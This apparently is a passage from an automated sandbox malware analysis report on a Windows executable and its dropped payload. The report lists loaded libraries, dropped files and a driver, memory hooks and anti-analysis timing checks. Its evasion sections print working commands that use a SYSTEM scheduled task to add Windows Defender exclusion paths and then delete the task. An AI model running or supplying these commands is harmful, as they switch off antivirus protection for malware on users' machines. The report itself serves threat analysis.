Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeFile written: C:\Users\Public\Music\destopbak.iniJump to behavior
Source: 23567791246-764698008.02.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 23567791246-764698008.02.exeStatic file information: File size 30976000 > 1048576
Source: 23567791246-764698008.02.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1d59400
Source: 23567791246-764698008.02.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: lSQb8c.exe, 00000005.00000002.3257653828.0000000003F9D000.00000004.00000020.00020000.00000000.sdmp, szbGon.exe.5.dr
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: c:\openjdk_new\build\windows-x86_64-normal-server-release\jdk\objs\javaw_objs\javaw.pdb source: 23567791246-764698008.02.exe
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: lSQb8c.exe, 00000004.00000000.3038118717.0000000140014000.00000002.00000001.01000000.00000008.sdmp, lSQb8c.exe, 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmp, lSQb8c.exe, 00000005.00000002.3257745540.0000000140014000.00000002.00000001.01000000.00000008.sdmp, lSQb8c.exe, 00000005.00000000.3057333552.0000000140014000.00000002.00000001.01000000.00000008.sdmp, lSQb8c.exe.0.dr
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_000000014000F000
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 5_2_02B1C2B4 push rbp; ret 5_2_02B1C2BA
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 5_2_02A7D2DD push qword ptr [rsp+rsi*2-644654D0h]; ret 5_2_02A7D337

Persistence and Installation Behavior

barindex
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeFile created: C:\Users\user\Documents\lSQb8c.exeJump to dropped file
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeFile created: C:\Users\user\Documents\lSQb8c.exeJump to dropped file
Source: C:\Users\user\Documents\lSQb8c.exeFile created: C:\Program Files (x86)\szbGon\szbGon.exeJump to dropped file
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file

Boot Survival

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,4_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Users\user\Documents\lSQb8c.exeMemory written: PID: 3772 base: 7FF8C8A50008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeMemory written: PID: 3772 base: 7FF8C88ED9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeMemory written: PID: 6680 base: 7FF8C8A50008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeMemory written: PID: 6680 base: 7FF8C88ED9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeRDTSC instruction interceptor: First address: 1400010AF second address: 1400010C6 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeRDTSC instruction interceptor: First address: 1400010C6 second address: 1400010C6 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007F3228E2AEB0h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Documents\lSQb8c.exeRDTSC instruction interceptor: First address: 56DF85 second address: 56DF93 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 5_2_0056DF85 rdtsc 5_2_0056DF85
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeWindow / User API: threadDelayed 561Jump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeWindow / User API: threadDelayed 438Jump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeDropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Documents\lSQb8c.exeDropped PE file which has not been started: C:\Program Files (x86)\szbGon\szbGon.exeJump to dropped file
Source: C:\Users\user\Documents\lSQb8c.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_4-14108
Source: C:\Users\user\Documents\lSQb8c.exeAPI coverage: 2.7 %
Source: C:\Users\user\Desktop\23567791246-764698008.02.exe TID: 3716Thread sleep count: 561 > 30Jump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exe TID: 3716Thread sleep time: -280500s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exe TID: 3716Thread sleep count: 438 > 30Jump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exe TID: 3716Thread sleep time: -219000s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_00007FF8BFAFA1B8 FindFirstFileExW,4_2_00007FF8BFAFA1B8
Source: 23567791246-764698008.02.exe, 00000000.00000003.2882892555.00000000005BF000.00000004.00000020.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256439510.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, lSQb8c.exe, 00000005.00000002.3256439510.0000000000557000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Documents\lSQb8c.exeAPI call chain: ExitProcess graph end nodegraph_4-14109
Source: C:\Users\user\Documents\lSQb8c.exeAPI call chain: ExitProcess graph end nodegraph_4-14452
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 5_2_0056DF85 rdtsc 5_2_0056DF85
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_00000001400073E0 LdrLoadDll,4_2_00000001400073E0
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0000000140007C91
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_000000014000F000
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,4_2_0000000140004630
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0000000140007C91
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00000001400106B0
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_00000001400092E0 SetUnhandledExceptionFilter,4_2_00000001400092E0
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_00007FF8BFAF1F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF8BFAF1F50
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_00007FF8BFAF76E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF8BFAF76E0
Source: C:\Users\user\Documents\lSQb8c.exeCode function: 4_2_00007FF8BFAF2630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF8BFAF2630

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Documents\lSQb8c.exeNtProtectVirtualMemory: Indirect: 0x29CB253Jump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeNtAllocateVirtualMemory: Indirect: 0x140006FD0Jump to behavior
Source: C:\Users\user\Desktop\23567791246-764698008.02.exeNtDelayExecution: Indirect: 0x4D94D4Jump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeNtProtectVirtualMemory: Indirect: 0x2B6B253Jump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Users\user\Documents\lSQb8c.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\lSQb8c.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\lSQb8c.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\lSQb8c.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
